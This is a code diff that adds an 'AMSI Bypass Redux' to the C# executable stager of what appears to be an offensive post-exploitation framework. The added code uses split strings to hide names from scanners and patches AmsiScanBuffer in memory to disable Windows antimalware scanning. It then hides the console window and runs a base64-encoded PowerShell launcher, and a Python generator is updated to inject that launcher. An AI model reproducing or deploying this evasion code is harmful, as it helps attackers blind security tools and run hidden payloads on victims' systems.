Added AMSI Bypass Redux to Csharp Stager

data/misc/cSharpTemplateResources/cmd/cmd/Program.cs

@@ -1,4 +1,4 @@
-/*
+/*
  * 
  * You may compile this in Visual Studio or SharpDevelop etc.
  * 
@@ -10,15 +10,51 @@
 using System.Text;
 using System.Management.Automation; 
 using System.Management.Automation.Runspaces; 
+using System.Runtime.InteropServices;
 
 namespace cmd
 {
-	class Program
-	{
-		public static void Main(string[] args)
-		{
-			string stager = " YOUR CODE GOES HERE";
-			var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
+    public class Mata 
+    {
+        [DllImport("kern"+"el32")]
+        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+        [DllImport("kern"+"el32")]
+        public static extern IntPtr LoadLibrary(string name);
+        [DllImport("kern"+"el32")]
+        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
+        [DllImport("Kern"+"el32.dll", EntryPoint = "Rtl" + "Move" + "Memory", SetLastError = false)]
+        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
+        public static int SaMierda() 
+        {
+            IntPtr TargetDLL = LoadLibrary("a" + "ms" + "i." + "dll");
+            if (TargetDLL == IntPtr.Zero) { return 1; }
+            IntPtr WootPtr = GetProcAddress(TargetDLL, "Am" + "si" + "Scan" + "Buf" + "fer");
+            if (WootPtr == IntPtr.Zero) { return 1; }
+            UIntPtr dwSize = (UIntPtr)5;
+            uint Zero = 0;
+            if (!VirtualProtect(WootPtr, dwSize, 0x40, out Zero)) { return 1; }
+            Byte[] Patch = { 0x31, 0xff, 0x90 };
+            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
+            Marshal.Copy(Patch, 0, unmanagedPointer, 3);
+            MoveMemory(WootPtr + 0x001b, unmanagedPointer, 3);
+            return 0;
+        }
+    }
+
+    class Program
+    {
+        [DllImport("kern"+"el32.dll")]
+        static extern IntPtr GetConsoleWindow();
+        [DllImport("user"+"32.dll")]
+        static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
+        const int SW_HIDE = 0;
+        public static void Main(string[] args)
+        {
+            Mata.SaMierda();
+            var handle = GetConsoleWindow();
+            ShowWindow(handle, SW_HIDE);
+            string stager = " YOUR CODE GOES HERE";
+            var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
 
             Runspace runspace = RunspaceFactory.CreateRunspace();
             runspace.Open();
@@ -30,5 +66,5 @@ public static void Main(string[] args)
             pipeline.Commands.Add("Out-String");
             pipeline.Invoke();
         }
-	}
-}
+    }
+}

lib/stagers/windows/csharp_exe.py

@@ -125,7 +125,7 @@ def generate(self):
                 shutil.copytree(directory,destdirectory)
 
                 lines = open(destdirectory + 'cmd/Program.cs').read().splitlines()
-                lines[19] = "\t\t\tstring stager = \"" + launcherCode + "\";"
+                lines[55] = "\t\t\tstring stager = \"" + launcherCode + "\";"
                 open(destdirectory + 'cmd/Program.cs','w').write('\n'.join(lines))
                 shutil.make_archive(outfile,'zip',destdirectory)
                 shutil.rmtree(destdirectory)